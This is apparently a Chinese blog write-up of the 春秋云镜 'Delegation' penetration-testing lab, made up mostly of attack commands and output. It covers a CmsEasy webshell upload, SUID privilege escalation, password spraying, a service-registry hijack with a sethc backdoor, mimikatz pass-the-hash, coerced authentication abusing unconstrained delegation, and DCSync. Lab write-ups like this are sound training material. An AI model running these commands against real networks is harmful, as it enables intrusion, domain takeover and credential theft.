首页 > 其他分享 >春秋云镜 Delegation

春秋云镜 Delegation

时间:2024-08-22 10:26:19浏览次数:8  
标签:bin 春秋 云镜 Delegation flag usr 4.45 open 172.22

现用fscan扫一下入口机
image
发现是cmseasy,在/admin路由处可以登录,弱密码admin123456
这里存在CVE漏洞,写个马进去
image

get:
/index.php?case=template&act=save&admin_dir=admin&site=default
post:
sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php @eval($_POST[1]);?>
回显OK说明上传成功
image

蚁剑链接,反弹shell到vps
查看一下suid位

find / -user root -perm -4000 -print 2>/dev/null

结果如下

/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

使用diff提权

diff --line-format=%L /dev/null /home/flag/flag01.txt

image

flag:flag{d9a0b461-21df-4a64-9ad9-0e650adfd950}
配置nps代理,传个fscan扫内网

172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.45:135 open
172.22.4.7:139 open
172.22.4.7:135 open
172.22.4.19:135 open
[*] NetInfo:
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] 172.22.4.7  (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetInfo:
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetBios: 172.22.4.45     XIAORANG\WIN19                 
[*] NetBios: 172.22.4.7      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.22.4.36        code:200 len:68069  title:中文网页标题
[*] WebTitle: http://172.22.4.45        code:200 len:703    title:IIS Windows Server

总感觉fscan扫的太慢了...
上面的flag提示要打win19去爆破密码

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19

得到密码

WIN19\Adrian
babygirl1

先用kali登一下去改密码

proxychains rdesktop 172.22.4.45

改完还是回到windows下去登(kali太慢了)
在其中找到了一个html文件,内容包含如下部分
image

意识是这个ModifiablePath是普通用户可写的.因此可以进行注册表提权
首先使用msf生成一个木马来执行我们的shift.bat

msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\shift.bat" --platform windows -f exe-service > evil.exe

然后新建一个shift.bat如下

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

依次执行如下命令

## 修改注册表
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\evil.exe" /f
## 重启服务
sc start gupdate

锁定用户,连按5下shift,弹出shell
image

创建一个新的用户lbz,添加到管理员组,然后进行远程连接

net user lbz lbz041130 /add
net localgroup administrators lbz /add

拿到了第二个flag
flag:flag{c015ba18-f75e-4c0b-8b8e-5e82b9a48205}
上传mimikatz,去抓取本地哈希

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

image

得到了域用户win19$的NTLM
d776bd558e56bbc4f47eed38dc9e4d05
使用mimikatz进行哈希横传.

mimikatz "privilege::debug" "sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:d776bd558e56bbc4f47eed38dc9e4d05" 

弹出了域用户的管理员终端
image

上传一个SharpHound去抓域信息

SharpHound.exe -c all

发现这个WIN19 和 DC01 都存在非约束性委托
image

上传Rubeus监听TGT

Rubeus.exe monitor /interval:1 /filteruser:DC01$

使用dfscoerce.py去诱导DC01向win19$发起请求

proxychains python3 dfscoerce.py -u "WIN19$" -hashes :d776bd558e56bbc4f47eed38dc9e4d05 -d xiaorang.lab win19 172.22.4.7

image

成功截获DC01的TGT
将得到的base64放入base64.txt中,使用如下命令解码

certutil -f -decode base64.txt DC.kirbi

此时有了Domain Admain权限,可以打一个DCsync

mimikatz.exe "kerberos::purge" "kerberos::ptt DC.kirbi" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

image

得到了Administractor的NTLM哈希4889f6553239ace1f7c47fa2c619c252
哈希横传获得其他两个机器上的flag

proxychains crackmapexec smb 172.22.4.19 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag:flag{20e2ee96-53b2-4f36-b09e-f3d0744186f1}

proxychains crackmapexec smb 172.22.4.7 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

flag:flag{57502dcf-63db-48b4-93e7-adafa2dd20aa}

共用时1小时24分,是目前最快的一次.这个靶场学到了很多东西,同时清晰了很多概念...会看bloodhound了.第一次进行非约束委派攻击.
image

标签:bin,春秋,云镜,Delegation,flag,usr,4.45,open,172.22
From: https://www.cnblogs.com/meraklbz/p/18373310

相关文章

  • 【内网渗透】最保姆级的春秋云镜initial打靶笔记
    目录flag1flag2flag3 flag1外网thinkphp服务 随便找个工具梭连蚁剑读/root目录要提权suid没有可利用的提权命令,打sudo提权sudo-lmysql的sudo提权 Linux提权之Sudo70种提权方法-简单安全 查看文件名带flag的文件sudomysql-e'\!find/-typef-n......
  • 春秋云镜 Brute4Road
    先用fscan扫一下内网尝试打redis主从python3redis-rogue-server.py--rhost39.98.122.75--lhost123.57.23.40需要在vps下使用,选择r,然后输入要反弹的ip,port使用pty获得交互式shellpython-c'importpty;pty.spawn("/bin/bash")'尝试UID提权find/-userroot-......
  • 春秋云镜 time
    先用fscan扫一下,得到了下面的端口挨个尝试,访问7473发现是个neo4j的服务.这个neo4j的server只出现过这一个历史漏洞我们在网上下载jar漏洞利用文件,然后在本地运行.注意:一定是要java8,同时反弹shell的时候要使用编码防止传输中出现错误运行命令java-jar.\rhino_gadget......
  • 春秋云镜 tsclient
    入口机给了个ip首先用fscan扫一下看看发现存在mysql远程登录,弱口令都扫出来了.使用MDUT进行远程登录登录以后上传cs马,选(s)这个.注意要上传到C:/Users/Public/,因为public文件夹通常有写的权限然后执行命令C:/Users/Public/beacon.exe回到cs中成功得到shell调整休眠时......
  • 春秋云境 | 逻辑漏洞 | CVE-2022-23134
    目录靶标介绍开启靶场获取flag靶标介绍ZabbixSiaZabbix是拉脱维亚ZabbixSIA(ZabbixSia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix存在安全漏洞,该漏洞源于在初始设置过程之后,setup.php文件的某些步骤不仅可以由超级......
  • 春秋云境 | 逻辑漏洞 | CVE-2020-13933
    靶标介绍<p>ApahceShiro由于处理身份验证请求时出错存在权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。</p>开启靶场发现不管拿点哪里都是登录页面,发现登录框那里写着flag在/admin里访问之后并没有反应,在后......
  • 春秋云境 | RCE | CVE-2022-25578
    目录靶标介绍开启靶场蚁剑连接获取flag 靶标介绍taocmsv3.0.2允许攻击者通过编辑.htaccess文件执行任意代码开启靶场点击下面的管理发现是一个登录页面,默认用户名是admin密码是tao登录上来之后,进入到文件管理,编辑.htaccess文件,插入下面这条代码SetH......
  • 春秋云境 | RCE | CVE-2019-12422
    目录靶标介绍开启靶场漏洞利用靶标介绍ApacheShiro是美国阿帕奇(Apache)软件基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。ApacheShiro1.4.2之前版本中存在安全漏洞。当ApacheShiro使用了默认的‘记住我’配置时,攻击者可利用该漏洞对cookies实施......
  • 春秋云镜CVE-2023-38836
    打开靶场环境点击发现一个登陆框,弱口令试一下发现账号密码为admin,password随便点击点击Media发现这里可以上传文件上传木马试试<?php@eval($_POST["wjq"]);?>发现不能上传php文件php内容修改他的格式抓包绕过一下302就可以其实已经写进去了点一下4......
  • CVE-2019-12422~shiro反序列化【春秋云境靶场渗透】
    #今天我们来攻克CVE-2019-12422春秋云境这个靶场漏洞当我们知道了该靶场是shiro反序列化漏洞,所以直接用工具梭哈好小子,离成功又近一步!!!......